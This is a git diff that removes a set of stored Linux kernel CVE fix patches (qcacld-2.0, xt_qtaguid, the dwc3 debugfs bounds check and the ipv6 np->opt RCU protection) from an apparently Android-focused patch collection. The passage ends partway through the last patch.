-Subject: qcacld-2.0: Fix buffer overwrite problem in CCXPLMREQ
-
-Set the number of channels to minimum of input data and
-WNI_CFG_VALID_CHANNEL_LIST_LEN.
-
-Change-Id: Ib6fca483ac99cddfcd3b739ce62e86ecd498f1f5
-CRs-Fixed: 1001450
----
- CORE/HDD/src/wlan_hdd_main.c | 14 +++++++-------
- 1 file changed, 7 insertions(+), 7 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_main.c b/CORE/HDD/src/wlan_hdd_main.c
-index a6249e1..38452eb 100644
---- a/CORE/HDD/src/wlan_hdd_main.c
-+++ b/CORE/HDD/src/wlan_hdd_main.c
-@@ -3002,8 +3002,9 @@ static eHalStatus hdd_parse_plm_cmd(tANI_U8 *pValue, tSirPlmReq *pPlmRequest)
-         if (content < 0)
-            return eHAL_STATUS_FAILURE;
- 
-+        content = VOS_MIN(content, WNI_CFG_VALID_CHANNEL_LIST_LEN);
-         pPlmRequest->plmNumCh = content;
--        hddLog(VOS_TRACE_LEVEL_DEBUG, "numch %d", pPlmRequest->plmNumCh);
-+        hddLog(LOG1, FL("Numch: %d"), pPlmRequest->plmNumCh);
- 
-         /* Channel numbers */
-         for (count = 0; count < pPlmRequest->plmNumCh; count++)
-@@ -3021,10 +3022,9 @@ static eHalStatus hdd_parse_plm_cmd(tANI_U8 *pValue, tSirPlmReq *pPlmRequest)
-              if (1 != ret) return eHAL_STATUS_FAILURE;
- 
-              ret = kstrtos32(buf, 10, &content);
--             if ( ret < 0) return eHAL_STATUS_FAILURE;
--
--             if (content <= 0)
--                return eHAL_STATUS_FAILURE;
-+             if (ret < 0 || content <= 0 ||
-+                 content > WNI_CFG_CURRENT_CHANNEL_STAMAX)
-+                 return eHAL_STATUS_FAILURE;
- 
-              pPlmRequest->plmChList[count]= content;
-              hddLog(VOS_TRACE_LEVEL_DEBUG, " ch- %d",
-@@ -6464,11 +6464,11 @@ static int hdd_driver_command(hdd_adapter_t *pAdapter,
-        {
-            tANI_U8 *value = command;
-            eHalStatus status = eHAL_STATUS_SUCCESS;
--           tpSirPlmReq pPlmRequest = NULL;
-+           tpSirPlmReq pPlmRequest;
- 
-            pPlmRequest = vos_mem_malloc(sizeof(tSirPlmReq));
-            if (NULL == pPlmRequest){
--               ret = -EINVAL;
-+               ret = -ENOMEM;
-                goto exit;
-            }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3809/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3809/ANY/0001.patch
deleted file mode 100644
index c172fbd7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3809/ANY/0001.patch
+++ /dev/null
@@ -1,13 +0,0 @@
-diff --git a/net/netfilter/xt_qtaguid.c b/net/netfilter/xt_qtaguid.c
-index c690e0f..9ce6228 100644
---- a/net/netfilter/xt_qtaguid.c
-+++ b/net/netfilter/xt_qtaguid.c
-@@ -2521,7 +2521,7 @@
- 	uid_t stat_uid = get_uid_from_tag(tag);
- 	struct proc_print_info *ppi = m->private;
- 	/* Detailed tags are not available to everybody */
--	if (get_atag_from_tag(tag) && !can_read_other_uid_stats(stat_uid)) {
-+	if (!can_read_other_uid_stats(stat_uid)) {
- 		CT_DEBUG("qtaguid: stats line: "
- 			 "%s 0x%llx %u: insufficient priv "
- 			 "from pid=%u tgid=%u uid=%u stats.gid=%u\n",
diff --git a/Patches/Linux_CVEs/CVE-2016-3809/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-3809/ANY/0001.patch.base64
deleted file mode 100644
index 7ea5620c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3809/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL25ldC9uZXRmaWx0ZXIveHRfcXRhZ3VpZC5jIGIvbmV0L25ldGZpbHRlci94dF9xdGFndWlkLmMKaW5kZXggYzY5MGUwZi4uOWNlNjIyOCAxMDA2NDQKLS0tIGEvbmV0L25ldGZpbHRlci94dF9xdGFndWlkLmMKKysrIGIvbmV0L25ldGZpbHRlci94dF9xdGFndWlkLmMKQEAgLTI1MjEsNyArMjUyMSw3IEBACiAJdWlkX3Qgc3RhdF91aWQgPSBnZXRfdWlkX2Zyb21fdGFnKHRhZyk7CiAJc3RydWN0IHByb2NfcHJpbnRfaW5mbyAqcHBpID0gbS0+cHJpdmF0ZTsKIAkvKiBEZXRhaWxlZCB0YWdzIGFyZSBub3QgYXZhaWxhYmxlIHRvIGV2ZXJ5Ym9keSAqLwotCWlmIChnZXRfYXRhZ19mcm9tX3RhZyh0YWcpICYmICFjYW5fcmVhZF9vdGhlcl91aWRfc3RhdHMoc3RhdF91aWQpKSB7CisJaWYgKCFjYW5fcmVhZF9vdGhlcl91aWRfc3RhdHMoc3RhdF91aWQpKSB7CiAJCUNUX0RFQlVHKCJxdGFndWlkOiBzdGF0cyBsaW5lOiAiCiAJCQkgIiVzIDB4JWxseCAldTogaW5zdWZmaWNpZW50IHByaXYgIgogCQkJICJmcm9tIHBpZD0ldSB0Z2lkPSV1IHVpZD0ldSBzdGF0cy5naWQ9JXVcbiIsCg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-3813/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-3813/3.10/0001.patch
deleted file mode 100644
index 7c2f848a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3813/3.10/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 3c0add95808fdada98ba0ab465c0b4ba49e71d26 Mon Sep 17 00:00:00 2001
-From: Vijayavardhan Vennapusa <vvreddy@codeaurora.org>
-Date: Thu, 5 May 2016 14:37:08 +0530
-Subject: USB: dwc3: debugfs: Add boundary check in dwc3_store_ep_num()
-
-User can pass arguments as part of write to requests and endpoint number
-will be calculated based on the arguments. There is a chance that driver
-can access ep structue that is not allocated due to invalid arguments
-passed by user. Hence fix the issue by having check and return error in
-case of invalid arguments.
-
-Change-Id: I060ea878b55ce0f9983b91c50e58718c8a2c2fa1
-Signed-off-by: Vijayavardhan Vennapusa <vvreddy@codeaurora.org>
----
- drivers/usb/dwc3/debugfs.c | 12 ++++++++++--
- 1 file changed, 10 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/usb/dwc3/debugfs.c b/drivers/usb/dwc3/debugfs.c
-index 857b413..fc3f959 100644
---- a/drivers/usb/dwc3/debugfs.c
-+++ b/drivers/usb/dwc3/debugfs.c
-@@ -650,7 +650,7 @@ static ssize_t dwc3_store_ep_num(struct file *file, const char __user *ubuf,
- 	struct seq_file		*s = file->private_data;
- 	struct dwc3		*dwc = s->private;
- 	char			kbuf[10];
--	unsigned int		num, dir;
-+	unsigned int		num, dir, temp;
- 	unsigned long		flags;
- 
- 	memset(kbuf, 0, 10);
-@@ -661,8 +661,16 @@ static ssize_t dwc3_store_ep_num(struct file *file, const char __user *ubuf,
- 	if (sscanf(kbuf, "%u %u", &num, &dir) != 2)
- 		return -EINVAL;
- 
-+	if (dir != 0 && dir != 1)
-+		return -EINVAL;
-+
-+	temp = (num << 1) + dir;
-+	if (temp >= (dwc->num_in_eps + dwc->num_out_eps) ||
-+					temp >= DWC3_ENDPOINTS_NUM)
-+		return -EINVAL;
-+
- 	spin_lock_irqsave(&dwc->lock, flags);
--	ep_num = (num << 1) + dir;
-+	ep_num = temp;
- 	spin_unlock_irqrestore(&dwc->lock, flags);
- 
- 	return count;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3813/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-3813/3.18/0002.patch
deleted file mode 100644
index dc954494..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3813/3.18/0002.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From de81d402f12a3492400644024e694748d3514951 Mon Sep 17 00:00:00 2001
-From: Vijayavardhan Vennapusa <vvreddy@codeaurora.org>
-Date: Thu, 5 May 2016 14:37:08 +0530
-Subject: USB: dwc3: debugfs: Add boundary check in dwc3_store_ep_num()
-
-User can pass arguments as part of write to requests and endpoint number
-will be calculated based on the arguments. There is a chance that driver
-can access ep structue that is not allocated due to invalid arguments
-passed by user. Hence fix the issue by having check and return error in
-case of invalid arguments.
-
-Change-Id: I060ea878b55ce0f9983b91c50e58718c8a2c2fa1
-Signed-off-by: Vijayavardhan Vennapusa <vvreddy@codeaurora.org>
----
- drivers/usb/dwc3/debugfs.c | 12 ++++++++++--
- 1 file changed, 10 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/usb/dwc3/debugfs.c b/drivers/usb/dwc3/debugfs.c
-index 7a88671..c82647f 100644
---- a/drivers/usb/dwc3/debugfs.c
-+++ b/drivers/usb/dwc3/debugfs.c
-@@ -630,7 +630,7 @@ static ssize_t dwc3_store_ep_num(struct file *file, const char __user *ubuf,
- 	struct seq_file		*s = file->private_data;
- 	struct dwc3		*dwc = s->private;
- 	char			kbuf[10];
--	unsigned int		num, dir;
-+	unsigned int		num, dir, temp;
- 	unsigned long		flags;
- 
- 	memset(kbuf, 0, 10);
-@@ -641,8 +641,16 @@ static ssize_t dwc3_store_ep_num(struct file *file, const char __user *ubuf,
- 	if (sscanf(kbuf, "%u %u", &num, &dir) != 2)
- 		return -EINVAL;
- 
-+	if (dir != 0 && dir != 1)
-+		return -EINVAL;
-+
-+	temp = (num << 1) + dir;
-+	if (temp >= (dwc->num_in_eps + dwc->num_out_eps) ||
-+					temp >= DWC3_ENDPOINTS_NUM)
-+		return -EINVAL;
-+
- 	spin_lock_irqsave(&dwc->lock, flags);
--	ep_num = (num << 1) + dir;
-+	ep_num = temp;
- 	spin_unlock_irqrestore(&dwc->lock, flags);
- 
- 	return count;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3841/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3841/ANY/0001.patch
deleted file mode 100644
index 548bec76..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3841/ANY/0001.patch
+++ /dev/null
@@ -1,567 +0,0 @@
-From 45f6fad84cc305103b28d73482b344d7f5b76f39 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Sun, 29 Nov 2015 19:37:57 -0800
-Subject: ipv6: add complete rcu protection around np->opt
-
-This patch addresses multiple problems :
-
-UDP/RAW sendmsg() need to get a stable struct ipv6_txoptions
-while socket is not locked : Other threads can change np->opt
-concurrently. Dmitry posted a syzkaller
-(http://github.com/google/syzkaller) program desmonstrating
-use-after-free.
-
-Starting with TCP/DCCP lockless listeners, tcp_v6_syn_recv_sock()
-and dccp_v6_request_recv_sock() also need to use RCU protection
-to dereference np->opt once (before calling ipv6_dup_options())
-
-This patch adds full RCU protection to np->opt
-
-Reported-by: Dmitry Vyukov <dvyukov@google.com>
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- include/linux/ipv6.h             |  2 +-
- include/net/ipv6.h               | 21 ++++++++++++++++++++-
- net/dccp/ipv6.c                  | 33 +++++++++++++++++++++------------
- net/ipv6/af_inet6.c              | 13 +++++++++----
- net/ipv6/datagram.c              |  4 +++-
- net/ipv6/exthdrs.c               |  3 ++-
- net/ipv6/inet6_connection_sock.c | 11 ++++++++---
- net/ipv6/ipv6_sockglue.c         | 33 ++++++++++++++++++++++-----------
- net/ipv6/raw.c                   |  8 ++++++--
- net/ipv6/syncookies.c            |  2 +-
- net/ipv6/tcp_ipv6.c              | 28 +++++++++++++++++-----------
- net/ipv6/udp.c                   |  8 ++++++--
- net/l2tp/l2tp_ip6.c              |  8 ++++++--
- 13 files changed, 122 insertions(+), 52 deletions(-)
-
-diff --git a/include/linux/ipv6.h b/include/linux/ipv6.h
-index 0ef2a97..402753b 100644
---- a/include/linux/ipv6.h
-+++ b/include/linux/ipv6.h
-@@ -227,7 +227,7 @@ struct ipv6_pinfo {
- 	struct ipv6_ac_socklist	*ipv6_ac_list;
- 	struct ipv6_fl_socklist __rcu *ipv6_fl_list;
- 
--	struct ipv6_txoptions	*opt;
-+	struct ipv6_txoptions __rcu	*opt;
- 	struct sk_buff		*pktoptions;
- 	struct sk_buff		*rxpmtu;
- 	struct inet6_cork	cork;
-diff --git a/include/net/ipv6.h b/include/net/ipv6.h
-index ea5a13e..9a5c9f0 100644
---- a/include/net/ipv6.h
-+++ b/include/net/ipv6.h
-@@ -205,6 +205,7 @@ extern rwlock_t ip6_ra_lock;
-  */
- 
- struct ipv6_txoptions {
-+	atomic_t		refcnt;
- 	/* Length of this structure */
- 	int			tot_len;
- 
-@@ -217,7 +218,7 @@ struct ipv6_txoptions {
- 	struct ipv6_opt_hdr	*dst0opt;
- 	struct ipv6_rt_hdr	*srcrt;	/* Routing Header */
- 	struct ipv6_opt_hdr	*dst1opt;
--
-+	struct rcu_head		rcu;
- 	/* Option buffer, as read by IPV6_PKTOPTIONS, starts here. */
- };
- 
-@@ -252,6 +253,24 @@ struct ipv6_fl_socklist {
- 	struct rcu_head			rcu;
- };
- 
-+static inline struct ipv6_txoptions *txopt_get(const struct ipv6_pinfo *np)
-+{
-+	struct ipv6_txoptions *opt;
-+
-+	rcu_read_lock();
-+	opt = rcu_dereference(np->opt);
-+	if (opt && !atomic_inc_not_zero(&opt->refcnt))
-+		opt = NULL;
-+	rcu_read_unlock();
-+	return opt;
-+}
-+
-+static inline void txopt_put(struct ipv6_txoptions *opt)
-+{
-+	if (opt && atomic_dec_and_test(&opt->refcnt))
-+		kfree_rcu(opt, rcu);
-+}
-+
- struct ip6_flowlabel *fl6_sock_lookup(struct sock *sk, __be32 label);
- struct ipv6_txoptions *fl6_merge_options(struct ipv6_txoptions *opt_space,
- 					 struct ip6_flowlabel *fl,
-diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
-index db5fc24..e7e0b9b 100644
---- a/net/dccp/ipv6.c
-+++ b/net/dccp/ipv6.c
-@@ -202,7 +202,9 @@ static int dccp_v6_send_response(const struct sock *sk, struct request_sock *req
- 	security_req_classify_flow(req, flowi6_to_flowi(&fl6));
- 
- 
--	final_p = fl6_update_dst(&fl6, np->opt, &final);
-+	rcu_read_lock();
-+	final_p = fl6_update_dst(&fl6, rcu_dereference(np->opt), &final);
-+	rcu_read_unlock();
- 
- 	dst = ip6_dst_lookup_flow(sk, &fl6, final_p);
- 	if (IS_ERR(dst)) {
-@@ -219,7 +221,10 @@ static int dccp_v6_send_response(const struct sock *sk, struct request_sock *req
- 							 &ireq->ir_v6_loc_addr,
- 							 &ireq->ir_v6_rmt_addr);
- 		fl6.daddr = ireq->ir_v6_rmt_addr;
--		err = ip6_xmit(sk, skb, &fl6, np->opt, np->tclass);
-+		rcu_read_lock();
-+		err = ip6_xmit(sk, skb, &fl6, rcu_dereference(np->opt),
-+			       np->tclass);
-+		rcu_read_unlock();
- 		err = net_xmit_eval(err);
- 	}
- 
-@@ -387,6 +392,7 @@ static struct sock *dccp_v6_request_recv_sock(const struct sock *sk,
- 	struct inet_request_sock *ireq = inet_rsk(req);
- 	struct ipv6_pinfo *newnp;
- 	const struct ipv6_pinfo *np = inet6_sk(sk);
-+	struct ipv6_txoptions *opt;
- 	struct inet_sock *newinet;
- 	struct dccp6_sock *newdp6;
- 	struct sock *newsk;
-@@ -488,13 +494,15 @@ static struct sock *dccp_v6_request_recv_sock(const struct sock *sk,
- 	 * Yes, keeping reference count would be much more clever, but we make
- 	 * one more one thing there: reattach optmem to newsk.
- 	 */
--	if (np->opt != NULL)
--		newnp->opt = ipv6_dup_options(newsk, np->opt);
--
-+	opt = rcu_dereference(np->opt);
-+	if (opt) {
-+		opt = ipv6_dup_options(newsk, opt);
-+		RCU_INIT_POINTER(newnp->opt, opt);
-+	}
- 	inet_csk(newsk)->icsk_ext_hdr_len = 0;
--	if (newnp->opt != NULL)
--		inet_csk(newsk)->icsk_ext_hdr_len = (newnp->opt->opt_nflen +
--						     newnp->opt->opt_flen);
-+	if (opt)
-+		inet_csk(newsk)->icsk_ext_hdr_len = opt->opt_nflen +
-+						    opt->opt_flen;
- 
- 	dccp_sync_mss(newsk, dst_mtu(dst));
- 
-@@ -757,6 +765,7 @@ static int dccp_v6_connect(struct sock *sk, struct sockaddr *uaddr,
- 	struct ipv6_pinfo *np = inet6_sk(sk);
- 	struct dccp_sock *dp = dccp_sk(sk);
- 	struct in6_addr *saddr = NULL, *final_p, final;
-+	struct ipv6_txoptions *opt;
- 	struct flowi6 fl6;
- 	struct dst_entry *dst;
- 	int addr_type;
-@@ -856,7 +865,8 @@ static int dccp_v6_connect(struct sock *sk, struct sockaddr *uaddr,
- 	fl6.fl6_sport = inet->inet_sport;
- 	security_sk_classify_flow(sk, flowi6_to_flowi(&fl6));
- 
--	final_p = fl6_update_dst(&fl6, np->opt, &final);
-+	opt = rcu_dereference_protected(np->opt, sock_owned_by_user(sk));
-+	final_p = fl6_update_dst(&fl6, opt, &final);
- 
- 	dst = ip6_dst_lookup_flow(sk, &fl6, final_p);
- 	if (IS_ERR(dst)) {
-@@ -876,9 +886,8 @@ static int dccp_v6_connect(struct sock *sk, struct sockaddr *uaddr,
- 	__ip6_dst_store(sk, dst, NULL, NULL);
- 
- 	icsk->icsk_ext_hdr_len = 0;
--	if (np->opt != NULL)
--		icsk->icsk_ext_hdr_len = (np->opt->opt_flen +
--					  np->opt->opt_nflen);
-+	if (opt)
-+		icsk->icsk_ext_hdr_len = opt->opt_flen + opt->opt_nflen;
- 
- 	inet->inet_dport = usin->sin6_port;
- 
-diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
-index 44bb66b..38d66dd 100644
---- a/net/ipv6/af_inet6.c
-+++ b/net/ipv6/af_inet6.c
-@@ -428,9 +428,11 @@ void inet6_destroy_sock(struct sock *sk)
- 
- 	/* Free tx options */
- 
--	opt = xchg(&np->opt, NULL);
--	if (opt)
--		sock_kfree_s(sk, opt, opt->tot_len);
-+	opt = xchg((__force struct ipv6_txoptions **)&np->opt, NULL);
-+	if (opt) {
-+		atomic_sub(opt->tot_len, &sk->sk_omem_alloc);
-+		txopt_put(opt);
-+	}
- }
- EXPORT_SYMBOL_GPL(inet6_destroy_sock);
- 
-@@ -659,7 +661,10 @@ int inet6_sk_rebuild_header(struct sock *sk)
- 		fl6.fl6_sport = inet->inet_sport;
- 		security_sk_classify_flow(sk, flowi6_to_flowi(&fl6));
- 
--		final_p = fl6_update_dst(&fl6, np->opt, &final);
-+		rcu_read_lock();
-+		final_p = fl6_update_dst(&fl6, rcu_dereference(np->opt),
-+					 &final);
-+		rcu_read_unlock();
- 
- 		dst = ip6_dst_lookup_flow(sk, &fl6, final_p);
- 		if (IS_ERR(dst)) {
-diff --git a/net/ipv6/datagram.c b/net/ipv6/datagram.c
-index d70b023..517c55b 100644
---- a/net/ipv6/datagram.c
-+++ b/net/ipv6/datagram.c
-@@ -167,8 +167,10 @@ ipv4_connected:
- 
- 	security_sk_classify_flow(sk, flowi6_to_flowi(&fl6));
- 
--	opt = flowlabel ? flowlabel->opt : np->opt;
-+	rcu_read_lock();
-+	opt = flowlabel ? flowlabel->opt : rcu_dereference(np->opt);
- 	final_p = fl6_update_dst(&fl6, opt, &final);
-+	rcu_read_unlock();
- 
- 	dst = ip6_dst_lookup_flow(sk, &fl6, final_p);
- 	err = 0;
-diff --git a/net/ipv6/exthdrs.c b/net/ipv6/exthdrs.c
-index ce203b0..ea7c4d6 100644
---- a/net/ipv6/exthdrs.c
-+++ b/net/ipv6/exthdrs.c
-@@ -727,6 +727,7 @@ ipv6_dup_options(struct sock *sk, struct ipv6_txoptions *opt)
- 			*((char **)&opt2->dst1opt) += dif;
- 		if (opt2->srcrt)
- 			*((char **)&opt2->srcrt) += dif;
-+		atomic_set(&opt2->refcnt, 1);
- 	}
- 	return opt2;
- }
-@@ -790,7 +791,7 @@ ipv6_renew_options(struct sock *sk, struct ipv6_txoptions *opt,
- 		return ERR_PTR(-ENOBUFS);
- 
- 	memset(opt2, 0, tot_len);
--
-+	atomic_set(&opt2->refcnt, 1);
- 	opt2->tot_len = tot_len;
- 	p = (char *)(opt2 + 1);
- 
-diff --git a/net/ipv6/inet6_connection_sock.c b/net/ipv6/inet6_connection_sock.c
-index 5d1c7ce..3ff5208 100644
---- a/net/ipv6/inet6_connection_sock.c
-+++ b/net/ipv6/inet6_connection_sock.c
-@@ -78,7 +78,9 @@ struct dst_entry *inet6_csk_route_req(const struct sock *sk,
- 	memset(fl6, 0, sizeof(*fl6));
- 	fl6->flowi6_proto = proto;
- 	fl6->daddr = ireq->ir_v6_rmt_addr;
--	final_p = fl6_update_dst(fl6, np->opt, &final);
-+	rcu_read_lock();
-+	final_p = fl6_update_dst(fl6, rcu_dereference(np->opt), &final);
-+	rcu_read_unlock();
- 	fl6->saddr = ireq->ir_v6_loc_addr;
- 	fl6->flowi6_oif = ireq->ir_iif;
- 	fl6->flowi6_mark = ireq->ir_mark;
-@@ -142,7 +144,9 @@ static struct dst_entry *inet6_csk_route_socket(struct sock *sk,
- 	fl6->fl6_dport = inet->inet_dport;
- 	security_sk_classify_flow(sk, flowi6_to_flowi(fl6));
- 
--	final_p = fl6_update_dst(fl6, np->opt, &final);
-+	rcu_read_lock();
-+	final_p = fl6_update_dst(fl6, rcu_dereference(np->opt), &final);
-+	rcu_read_unlock();
- 
- 	dst = __inet6_csk_dst_check(sk, np->dst_cookie);
- 	if (!dst) {
-@@ -175,7 +179,8 @@ int inet6_csk_xmit(struct sock *sk, struct sk_buff *skb, struct flowi *fl_unused
- 	/* Restore final destination back after routing done */
- 	fl6.daddr = sk->sk_v6_daddr;
- 
--	res = ip6_xmit(sk, skb, &fl6, np->opt, np->tclass);
-+	res = ip6_xmit(sk, skb, &fl6, rcu_dereference(np->opt),
-+		       np->tclass);
- 	rcu_read_unlock();
- 	return res;
- }
-diff --git a/net/ipv6/ipv6_sockglue.c b/net/ipv6/ipv6_sockglue.c
-index 63e6956..4449ad1 100644
---- a/net/ipv6/ipv6_sockglue.c
-+++ b/net/ipv6/ipv6_sockglue.c
-@@ -111,7 +111,8 @@ struct ipv6_txoptions *ipv6_update_options(struct sock *sk,
- 			icsk->icsk_sync_mss(sk, icsk->icsk_pmtu_cookie);
- 		}
- 	}
--	opt = xchg(&inet6_sk(sk)->opt, opt);
-+	opt = xchg((__force struct ipv6_txoptions **)&inet6_sk(sk)->opt,
-+		   opt);
- 	sk_dst_reset(sk);
- 
- 	return opt;
-@@ -231,9 +232,12 @@ static int do_ipv6_setsockopt(struct sock *sk, int level, int optname,
- 				sk->sk_socket->ops = &inet_dgram_ops;
- 				sk->sk_family = PF_INET;
- 			}
--			opt = xchg(&np->opt, NULL);
--			if (opt)
--				sock_kfree_s(sk, opt, opt->tot_len);
-+			opt = xchg((__force struct ipv6_txoptions **)&np->opt,
-+				   NULL);
-+			if (opt) {
-+				atomic_sub(opt->tot_len, &sk->sk_omem_alloc);
-+				txopt_put(opt);
-+			}
- 			pktopt = xchg(&np->pktoptions, NULL);
- 			kfree_skb(pktopt);
- 
-@@ -403,7 +407,8 @@ static int do_ipv6_setsockopt(struct sock *sk, int level, int optname,
- 		if (optname != IPV6_RTHDR && !ns_capable(net->user_ns, CAP_NET_RAW))
- 			break;
- 
--		opt = ipv6_renew_options(sk, np->opt, optname,
-+		opt = rcu_dereference_protected(np->opt, sock_owned_by_user(sk));
-+		opt = ipv6_renew_options(sk, opt, optname,
- 					 (struct ipv6_opt_hdr __user *)optval,
- 					 optlen);
- 		if (IS_ERR(opt)) {
-@@ -432,8 +437,10 @@ static int do_ipv6_setsockopt(struct sock *sk, int level, int optname,
- 		retv = 0;
- 		opt = ipv6_update_options(sk, opt);
- sticky_done:
--		if (opt)
--			sock_kfree_s(sk, opt, opt->tot_len);
-+		if (opt) {
-+			atomic_sub(opt->tot_len, &sk->sk_omem_alloc);
-+			txopt_put(opt);
-+		}
- 		break;
- 	}
- 
-@@ -486,6 +493,7 @@ sticky_done:
- 			break;
- 
- 		memset(opt, 0, sizeof(*opt));
-+		atomic_set(&opt->refcnt, 1);
- 		opt->tot_len = sizeof(*opt) + optlen;
- 		retv = -EFAULT;
- 		if (copy_from_user(opt+1, optval, optlen))
-@@ -502,8 +510,10 @@ update:
- 		retv = 0;
- 		opt = ipv6_update_options(sk, opt);
- done:
--		if (opt)
--			sock_kfree_s(sk, opt, opt->tot_len);
-+		if (opt) {
-+			atomic_sub(opt->tot_len, &sk->sk_omem_alloc);
-+			txopt_put(opt);
-+		}
- 		break;
- 	}
- 	case IPV6_UNICAST_HOPS:
-@@ -1110,10 +1120,11 @@ static int do_ipv6_getsockopt(struct sock *sk, int level, int optname,
- 	case IPV6_RTHDR:
- 	case IPV6_DSTOPTS:
- 	{
-+		struct ipv6_txoptions *opt;
- 
- 		lock_sock(sk);
--		len = ipv6_getsockopt_sticky(sk, np->opt,
--					     optname, optval, len);
-+		opt = rcu_dereference_protected(np->opt, sock_owned_by_user(sk));
-+		len = ipv6_getsockopt_sticky(sk, opt, optname, optval, len);
- 		release_sock(sk);
- 		/* check if ipv6_getsockopt_sticky() returns err code */
- 		if (len < 0)
-diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
-index dc65ec1..9914098 100644
---- a/net/ipv6/raw.c
-+++ b/net/ipv6/raw.c
-@@ -733,6 +733,7 @@ static int raw6_getfrag(void *from, char *to, int offset, int len, int odd,
- 
- static int rawv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
- {
-+	struct ipv6_txoptions *opt_to_free = NULL;
- 	struct ipv6_txoptions opt_space;
- 	DECLARE_SOCKADDR(struct sockaddr_in6 *, sin6, msg->msg_name);
- 	struct in6_addr *daddr, *final_p, final;
-@@ -839,8 +840,10 @@ static int rawv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
- 		if (!(opt->opt_nflen|opt->opt_flen))
- 			opt = NULL;
- 	}
--	if (!opt)
--		opt = np->opt;
-+	if (!opt) {
-+		opt = txopt_get(np);
-+		opt_to_free = opt;
-+		}
- 	if (flowlabel)
- 		opt = fl6_merge_options(&opt_space, flowlabel, opt);
- 	opt = ipv6_fixup_options(&opt_space, opt);
-@@ -906,6 +909,7 @@ done:
- 	dst_release(dst);
- out:
- 	fl6_sock_release(flowlabel);
-+	txopt_put(opt_to_free);
- 	return err < 0 ? err : len;
- do_confirm:
- 	dst_confirm(dst);
-diff --git a/net/ipv6/syncookies.c b/net/ipv6/syncookies.c
-index bb8f2fa..eaf7ac4 100644
---- a/net/ipv6/syncookies.c
-+++ b/net/ipv6/syncookies.c
-@@ -222,7 +222,7 @@ struct sock *cookie_v6_check(struct sock *sk, struct sk_buff *skb)
- 		memset(&fl6, 0, sizeof(fl6));
- 		fl6.flowi6_proto = IPPROTO_TCP;
- 		fl6.daddr = ireq->ir_v6_rmt_addr;
--		final_p = fl6_update_dst(&fl6, np->opt, &final);
-+		final_p = fl6_update_dst(&fl6, rcu_dereference(np->opt), &final);
- 		fl6.saddr = ireq->ir_v6_loc_addr;
- 		fl6.flowi6_oif = sk->sk_bound_dev_if;
- 		fl6.flowi6_mark = ireq->ir_mark;
-diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
-index c5429a6..6a50bb4 100644
---- a/net/ipv6/tcp_ipv6.c
-+++ b/net/ipv6/tcp_ipv6.c
-@@ -120,6 +120,7 @@ static int tcp_v6_connect(struct sock *sk, struct sockaddr *uaddr,
- 	struct ipv6_pinfo *np = inet6_sk(sk);
- 	struct tcp_sock *tp = tcp_sk(sk);
- 	struct in6_addr *saddr = NULL, *final_p, final;
-+	struct ipv6_txoptions *opt;
- 	struct flowi6 fl6;
- 	struct dst_entry *dst;
- 	int addr_type;
-@@ -235,7 +236,8 @@ static int tcp_v6_connect(struct sock *sk, struct sockaddr *uaddr,
- 	fl6.fl6_dport = usin->sin6_port;
- 	fl6.fl6_sport = inet->inet_sport;
- 
--	final_p = fl6_update_dst(&fl6, np->opt, &final);
-+	opt = rcu_dereference_protected(np->opt, sock_owned_by_user(sk));
-+	final_p = fl6_update_dst(&fl6, opt, &final);
- 
- 	security_sk_classify_flow(sk, flowi6_to_flowi(&fl6));
- 
-@@ -263,9 +265,9 @@ static int tcp_v6_connect(struct sock *sk, struct sockaddr *uaddr,
- 		tcp_fetch_timewait_stamp(sk, dst);
- 
- 	icsk->icsk_ext_hdr_len = 0;
--	if (np->opt)
--		icsk->icsk_ext_hdr_len = (np->opt->opt_flen +
--					  np->opt->opt_nflen);
-+	if (opt)
-+		icsk->icsk_ext_hdr_len = opt->opt_flen +
-+					 opt->opt_nflen;
- 
- 	tp->rx_opt.mss_clamp = IPV6_MIN_MTU - sizeof(struct tcphdr) - sizeof(struct ipv6hdr);
- 
-@@ -461,7 +463,8 @@ static int tcp_v6_send_synack(const struct sock *sk, struct dst_entry *dst,
- 		if (np->repflow && ireq->pktopts)
- 			fl6->flowlabel = ip6_flowlabel(ipv6_hdr(ireq->pktopts));
- 
--		err = ip6_xmit(sk, skb, fl6, np->opt, np->tclass);
-+		err = ip6_xmit(sk, skb, fl6, rcu_dereference(np->opt),
-+			       np->tclass);
- 		err = net_xmit_eval(err);
- 	}
- 
-@@ -972,6 +975,7 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
- 	struct inet_request_sock *ireq;
- 	struct ipv6_pinfo *newnp;
- 	const struct ipv6_pinfo *np = inet6_sk(sk);
-+	struct ipv6_txoptions *opt;
- 	struct tcp6_sock *newtcp6sk;
- 	struct inet_sock *newinet;
- 	struct tcp_sock *newtp;
